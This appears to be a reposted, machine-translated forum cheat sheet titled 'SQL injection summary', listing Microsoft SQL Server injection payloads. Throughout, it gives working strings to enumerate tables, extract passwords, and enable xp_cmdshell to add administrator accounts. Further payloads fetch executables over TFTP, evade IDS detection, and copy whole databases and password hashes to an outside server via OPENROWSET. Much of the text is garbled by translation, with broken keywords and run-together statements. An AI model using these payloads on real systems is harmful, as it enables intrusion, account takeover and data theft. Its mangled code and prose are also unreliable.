SQL injection summary

xiaoxiao2021-03-06 50

SQL injection summary (strongly recommended)

[Posted] Sql injection summary (from the early 'or'1' = '1) The most important table name: select * from sysobjectssysobjects ncsysobjectssysindexes tsysindexessyscolumnssystypessysuserssysdatabasessysxloginssysprocesses the most important ones the user name (default is there sql database) publicdboguest (general prohibition or no authority) db_sercurityadminab_dlladmin some default extension xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwritexp_availablemedia drive related xp_dirtree directory xp_enumdsn ODBC connection xp_loginconfig server security mode information xp_makecab create compressed volume xp_ntsec_enumdomains domain information xp_terminate_process terminal process, given a PID example: sp_addextendedproc 'xp_webserver' , 'c: /temp/xp_foo.dll'exec xp_webserversp_dropextendedproc' xp_webserver'bcp "select * FROM test..foo" queryout c: /inetpub/wwwroot/runcommand.asp -c -Slocalhost -Usa -Pfoobar 'group by users. ID Having 1 = 1- 'Group by users.id, users.username, users.password, users.privs hat 1 = 1-'; Insert Into Users Values (666, 'Attacker', 'FooBar', 0xfff) -Union SELECT TOP 1 Column_Name from Information_Schema.Columns Where Table_Name = 'log intable'-union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'logintable' where COLUMN_NAME NOT IN ( 'login_id') - union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'logintable' where COLUMN_NAME NOT IN ( 'login_id ',' login_name ') - union select TOP 1 login_name FROM logintable-union select TOP 1 password FROM logintable where login_name =' Rahul '- construction statement: query whether there xp_cmdshell' union select @@ version, 1,1,1- -AND 1 = (Select @@ version) and '

SA '= (Select System_User)' Union Select Ret, 1, 1, 1 from foo - 'union select min (username), 1, 1, 1 from username>' a'- 'union select min (username) 1, 1, 1 from username> 'admin'-' union select password, 1, 1, 1, 1, 1, 1, 1, one,,,,,,,,,,,,,,,,,,,,,,,,,, () -; DECLARE @Shell int exec sp_oacreate 'wscript.shell', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: /winnt/system32/cmd.exe / c net user swap 5245886 / add' and 1 = (select count (*) FROM master.dbo.sysobjects where xtype = 'X' aND name = 'xp_cmdshell'); EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'1 = (% 20select% 20count (*)% 20FROM% 20master.dbo.sysObjects% 20where% 20 type = 'x'% 20And% 20Name = 'xp_cmdshell') and 1 = (select is_srvrolemember ('sysadmin')) Judging whether SA authority is And 0 <> ( Select Top 1 Paths from NewTable) - Branches Dafa and 1 = (Select Name from Master.dbo.sysDatabases Where DBID = 7) Get the library name (from 1 to 5 is the ID, 6 or more can be judged) creation A virtual directory E disk: declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oame Thod @o, 'Run', NULL, 'CScript.exe C: /inetpub/wwroot/mkwebdir.vbs -w "Default Web Site" -V "E", "E: /"' Access Properties: (Match Write A WebShell) Declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c: /inetpub/wwroot/chaccess.vbs -a w3svc / 1 / root / E Browse'and 0 <> (Select Count (*) from master.dbo.sysdatabases where name>

1 and dbid = 6) Submit DBID = 7, 8, 9 .... Get more database name and 0 <> (Select Top 1 Name from bbs.dbo.sysobjects where xtype = 'u') is striking The table is assumed to get other tables for Adminand 0 <> (Select Top 1 Name from bbs.dbo.sysObjects where xtype = 'u' and name not in ('admin')). And 0 <> (Select Count (*) from bbs.dbo.sysobjects where xtype = 'u' and name = 'admin' and uid> (STR (ID))) Value Value Value assumes 18779569 UID = IDAND 0 <> (Select Top 1 Name from bbs.dbo.syscolumns where id = 18779569) Get a field of Admin, assume User_idand 0 <> (SELECT TOP 1 Name from bbs.dbo.syscolumns where id = 18779569 and name not in ('id', ...)) to fade other fields and 0 <(Select user_id from bbs bbs.dbo.admin where username> 1) You can get a password in order. . . . .

Assume that the presence of user_id usrname, password and other fields show.asp? Id = -1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from AdminShow.asp? ID = -1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from admin (union statement is popular, Access is also special skills with branches ::% 5c = '/' or put / and / modify% 5 Submit an AND 0 <> (Select Count (*) from master.dbo.sdatabases where name> 1 and dbid = 6) And 0 <> (SELECT TOP 1 Name from bbs.dbo.sysObjects where xtype = 'u') Get a table name and 0 <> (select top 1 name from bbs.dbo.sysobjects where xtype = 'u' and name not in ('address')) and 0 <> (Select Count (*) from bbs.dbo.sysobjects where xtype = 'u' and name = 'admin' and uid> (STR (ID))) Judgment ID value and 0 <> (SELECT TOP 1 Name from BBS .dbo.syscolumns where id = 773577794) All field http: //xx.xx.xx.xx/111.asp? id = 3400; Create Table [dbo]. [swap] ([swappass] [char] (255) ); - http: //xx.xx.xx.xx/111.asp? id = 3400 and (select top 1 swappass from swap) = 1; Create Table newTable (ID ID IDETENTITY (1, 1), Paths Varchar (500)) DECLARE @Test varchar (20) EXEC MASTER.. pP_REGREAD @ rootkey = 'hkey_local_machine', @ Key = 'System / CurrentControlSet / Services / W3SVC / Parameters / virtual roots / ', @Value_name =' / ', values = @ Test Output Insert INTO PATHS (PATH) VALUES (@test) http://61.131.96.39/pageshow.asp?tianname= Policy and Regulations & infoid = { 57C4165A-4206-4C0D-A8D2-E70666EE4E08}; USE% 20Master; declare% 20 @ s% 20% 20INT; EXEC% 20sp_oAcreate% 20 "wscript.shell", @ s% 20OUT; EXEC% 20SP_OAMETHOD% 20 @ s, " Run ", NULL," cmd.exe% 20 / c% 20PING% 201.1.1.1 "; - Get the web path D: / xxxx, next: http://xx.xx.xx.xx/111.asp ? id = 3400; use ku1; - http: //xx.xx.xx.xx/111.asp? id = 3400; CREATE TABLE CMD (STR Image);

- Traditional XP_CMDSHELL test procedure:; exec master "; exec master.dbo.sp_addlogin Hax; -; exec master.dbo.sp_password null, Hax, Hax; -; Exec Master.dbo .sp_addsrvrolemember HAX sysadmin; -; exec master.dbo.xp_cmdshell 'net user Hax 5258 / workstations: * / Times: all / passwordchg: Yes / PasswordReq: Yes / Active: Yes / add'; -; Exec Master.dbo .xp_cmdshell 'net localgroup administrators hax / add'; - exec master..xp_servicecontrol 'start', 'schedule' exec master..xp_servicecontrol 'start', 'server'http: //www.xxx.com/list.asp ClassID = 1; Declare @Shell int exec sp_oacreate 'wscript.shell', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: /winnt/system32/cmd.exe / c net user swap 5258 / add '; DECLARE @shell INT EXEC sP_OAcreate' wscript.shell ', @ shell OUTPUT EXEC sP_OAMETHOD @ shell,' run ', null,' C: /WINNT/system32/cmd.exe / c net localgroup administrators swap / add'http: //localhost/show.asp?id=1 '; Exec master..xp_cmdshell' tftp -i youip get file.exe'-declare @a sysname set @ a = 'xp _' 'cmdshell' exec @a ' DIR C: / 'DECLARE @a sysname set @ a =' xp ' ' _ cm ' ' dshell 'exec @a' DIR C: / '; DECLARE @A; set @ a = db_name (); backup Database @a To disk = 'Your IP Your Shared Directory Bak.dat' If the limit is limited.

Select * from OpenRowSet ('SQLOLEDB', 'Server'; 'Sa'; '', 'SELECT' '' '' EXEC MASTER.DBO.SP_ADDLOGIN HAX ') Traditional Query Construction: SELECT * from news where id = .. And Topic = ... and ..... Admin 'And (*) from [user] where username =' Victim 'And Right (Left (UserPass, 01), 1) =' 1 ' ) and userpass <> 'SELECT 123; -; use master; -: a' or name like 'fff%'; - Show with a user named FFFF. 'and 1 <> (user]); -; Update [users] set email = (Select Top 1 Name from sysobjects where xtype =' u 'and status> 0) Where name =' FFFF '; - Description: The above statement is to get the first user table in the database and put the table name in the mailbox field of the FFFF user.

By viewing the user information of FFFF, you can get the first table called AD and get the idffff 'of this table according to the table name Ad, Update [users] set email = (Select Top 1 id from sysobjects where xtype =' u 'and name = 'ad') Where name = 'fff'; - I can get the name of the second table in the next table, fff '; Update [users] set email = (Select Top 1 Name from sysobjects where xtype =' u 'and) ID> 581577110) WHERE Name = 'fff'; - fff '; Update [users] set email = (select top 1 count (id) from password) where name =' fff '; - fff'; Update [Users] Set email = (select top 1 pwd from password where id = 2) Where name = 'fff'; - fff '; Update [users] set email = (select top 1 name from password where id = 2) where name =' ffff '; - exec master..xp_servicecontrol' start ',' schedule 'exec master..xp_servicecontrol' start ',' server'sp_addextendedproc 'xp_webserver', 'c: /temp/xp_foo.dll' can be extended by a general storage Method call: EXEC XP_WEBSERVER Once this extension store is executed, it can be removed: sp_dropextendedProc 'xp_webserver' Insert Into Users Values (666, char (0x63) char (0x68) CHAR (0x72) char (0x69) char (0x73), char (0x63) char (0x68) char (0x72) char (0x69) CHAR (0x73), 0xfff) -insert Into Users Values (667 123, 123, 0xfffff) -Insert INTO Users VALUES (123, 'Admin' '-', 'Password', 0xfff) -; and user> 0 ;; and (select count (*) from sysobjects> 0 ;; (Select Count (*) from mySysObjects> 0 // for Access database -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------- Some of usually injected: a) ID = 49 The parameters of this type of injected are digital type, the SQL statement is roughly as follows : SELECT * FROM Table Name Where field = 49 The parameter of the injected is id = 49 and [Query Condition], that is, the generated statement: SELECT * FROM table name Where field = 49 and [query condition] (b) class =

The parameters such as the continuous drama are characters, and the SQL statement is generally approveled: select * from the name of the WHERE field = series' injection parameter is class = series' and "query criteria] and '' = ', that is, generated Statement: SELECT * FROM table name Where field = 'series of series' and' = '' (c) No filtered parameters, such as keyword = keyword, SQL statement is as follows: SELECT * FROM table Name WHERE Field Like '% Keyword%' Injection Parameters is Keyword = 'AND [Query Condition] and'% 25 '=', that is, the generating statement: SELECT * FROM table name Where Field Like '%' and [Query Conditions ] and '%' = '%' ;; and (select top 1 name from sysobjects where xtype = 'u' and status> 0)> 0SysObjects is the system table of SQL Server, stores all the table names, views, constraints, and others. Object, Xtype = 'u' and status> 0, indicating the table name established by the user, the above statement removes the first table name, smaller than 0, so that the error information exposes the table name. ; And (select top 1 col_name (Object_ID ('Name')> 0 After getting the table name from 5, use Object_ID ('Name') to get the internal ID, col_name ("COL_NAME) Table name ID, 1) Represents the first field name of the table, replace it with 2, 3, 4 ... You can get the field name inside the specified sheet one by one. POST.HTM content: It is mainly convenient to enter. </ iframe> <br> <form action = http: //test.com/count.asp target = p> <input name = "ID "value =" 1552; Update aaa set aaa = (select top 1 name from sysobjects where xtype = 'u' and status> 0); - "Style =" Width: 750> <input type = submit value = ">>> >>> <input type = hidden name = fno value = "2, 3"> </ form> enumerating his data table name: ID = 1552; Update AAA SET AAA = (Select Top 1 Name from sysobjects where Xtype = 'u' and status> 0); - This is to update the first table name to the field of AAA.</p> <p>Read the first table, the second table can be read out (adding the table name "just obtained after the condition). ID = 1552; Update aaa set aaa = (Select Top 1 Name from sysobjects where xtype = 'u' and status> 0 and name <> 'vote'); - then id = 1552 and exists (SELECT * AAA WHERE AAA > 5) Read the second table, ^^^^^^^^^^^^^^^</p> <p>Reading field is this: ID = 1552; Update aaa set aaa = (select top 1 col_name (Object_ID ('Name'), 1)); - then id = 1552 and exists (SELECT * from Aaa Where AAA> 5) Error, get the field name id = 1552; Update aaa set aaa = (object_id ('table name), 2)); - then id = 1552 and exists (SELECT * from AAA WHERE AAA> 5) Error, get the name of the field ------------------------------ Advanced Tips: [Get Data Name] [Segment Value Update to the table name, then you can get the table name] Update table name SESOBJECTS WHERE Xtype = u and status> 0 [and name <> "you get Name 'Identified One Add]) [WHER Condition] SELECT TOP 1 Name from sysobjects where xtype = u and status> 0 and name not in (' table1 ',' Table2 ', ...) Involved Database Administrator Account and system administrator account [Current account must be sysadmin group] [Get Data Table Field Name] [Update the field value as a field name, then you can get the value of this field "Update table name SET field = (Select Top 1 Col_Name (Object_ID ('To query the data table name'), the field list,: 1) [WHERE condition] bypass the IDS detection [Use variable] Declare @a sysname set @ a = 'XP _' ' Cmdshell 'exec @a' Dir C: / 'declare @a sysname set @ a =' xp ' ' _ cm ' ' dshell 'exec @a' DIR C: / '1, open remote database Basic syntax Select * from OpenrowSet ('SQLOLEDB', 'Server = ServerName; UID = SA; PWD = APACHY_123', 'SELECT * from Table1') Parameters: (1) OLE DB Provider Name2, where the connection string parameter can be any and port used to connect, such as select * from openrowset ('sqloledb', 'uid = sa; pwd = apachy_123; network = dbmssocn; address = 202.100.100.1, 1433;' , 'select * from table' To copy the entire database of the target host, first set up a connection on the target host and the database on your own machine (how to establish a remote connection on the target host, just have already talked), after the INSERT all telecommunications Go to the local table.</p> <p>Basic syntax: INSERT INTO OPENROWSET ('sqloledb', 'server = servername; uid = sa; pwd = apachy_123', 'select * from table1') Select * from table2 This row statement copy all data in Table2 table on Table2 table on the target host Go to the Table1 table in the remote database. The actual use of the IP address and port of the connection string are appropriately modified, pointing to where you need, such as Insert Into OpenRowSet ('sqloledb', 'UID = SA; PWD = apachy_123; network = dbmssocn; address = 202.100.100.1, 1433; ',' select * from table1 ') select * from table2insert into OPENROWSET (' SQLOLEDB ',' uid = sa; pwd = hack3r; Network = DBMSSOCN; Address = 202.100.100.1,1433; ',' select * from _sysdatabases') select * from master.dbo.sysdatabases insert into OPENROWSET ( 'SQLOLEDB', 'uid = sa; pwd = hack3r; Network = DBMSSOCN; Address = 202.100.100.1,1433;', 'select * from _sysobjects') select * from user_database .dbo.sysobjects insert into OPENROWSET ( 'SQLOLEDB', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1,1433;', 'select * from _syscolumns') select * from user_database.dbo.syscolumns After that, you can see the library structure of the target host from the local database, which is easy, not much, copy database: INSERT INTO OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; network = dbmssocn; address = 202.100.100.1,1433; ',' select * from table1 ') select * from database..table1 insert into OPENROWSET (' SQLOLEDB ',' uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1 , 1433; ',' Select * from table2 ') Select * from database..table2 ... 3, complex 4, Haxi table (HASH) This is actually the above complex 5, an extension application of the database . The login password is stored in sysxlogins.</p> <p>As follows: insert into OPENROWSET ( 'SQLOLEDB', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins give After Hash, 6 can make violent cracks. This requires a little luck and a lot of time.</p> <p>Ways to traverse catalog: Create a temporary table: Temp'5; Create Table Temp (ID NVARCHAR (255), Num2 NVARCHAR (255), Num3 NVARCHAR (255)); - 5 '; Insert Temp Exec Master.dbo.xp_availablemedia; - Get all current drive 5 '; Insert Into Temp (ID) exec master.dbo.xp_subdirs' c: / '; - Loose subdirectories list 5'; Insert INTO TEMP (ID, Num1) exec master.dbo.xp_dirtree 'c: /'; - Get all subdirectories of the directory tree structure, inch into the TEMP table 5 '; INSERT INTO TEMP (ID) exec master.dbo.xp_cmdshell' Type C: /Web/index.asp'; - View content 5 '; Insert INTO TEMP (ID) Exec Master.dbo.xp_cmdshell' DIR C: / '; - 5'; Insert Into Temp (ID) EXEC MASTER.DBO.XP_CMDSHELL 'DIR C: / * .ASP / S / A'; - 5 '; INSERT INTO TEMP (ID) EXEC MASTER.DBO.XP_CMDSHEC' CScript C: /inetpub/adminscripts/adsutil.vbs Enum W3SVC '5'; INSERT INTO TEMP (ID, NUM1) EXEC MASTER.DBO.XP_DIRTREE 'C: /'; - (XP_Dirtree Application Public) Write Table: Statement 1: http://www.xxxxx.com/down /List.asp?id=1 and 1 = (select is_srvrolemember ('sysadmin')); - Statement 2: http://www.xxxxx.com/down/list.asp? id = 1 and 1 = (SELECT IS_SRVROLEMEMBER ('ServerAdmin')); - Statement 3: http://www.xxxx.com/down/list.asp? Id = 1 and 1 = (SEL ECT IS_SRVROLEMEMEMBER ('setupadmin')); - statement 4: http://www.xxxx.com/down/list.asp? id = 1 and 1 = (SELECT IS_SRVROLEMEMBER ('securityadmin')); - Statement 5 : Http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (SELECT IS_SRVROLEMEMBER ('securityadmin')); - Statement 6: http://www.xxxxx.com/down/ List.asp? id = 1 and 1 = (SELECT IS_SRVROLEMEMBER ('DiskAdmin')); - Statement 7: http://www.xxxx.com/down/list.asp? id = 1 and 1 = (SELECT IS_SRVROLEMEMEMBER ('bulkadmin')); - Statement 8:</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-81705.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="81705" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.045</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'TwJeQodp9NTuNt_2B3ZizNh3WQJTeURf41ZwX_2BJmWrx9cwE3ipdWYd7r6Rm0vE8cwSjvlfd1jrWyHPOJC11Rl6_2Bg_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>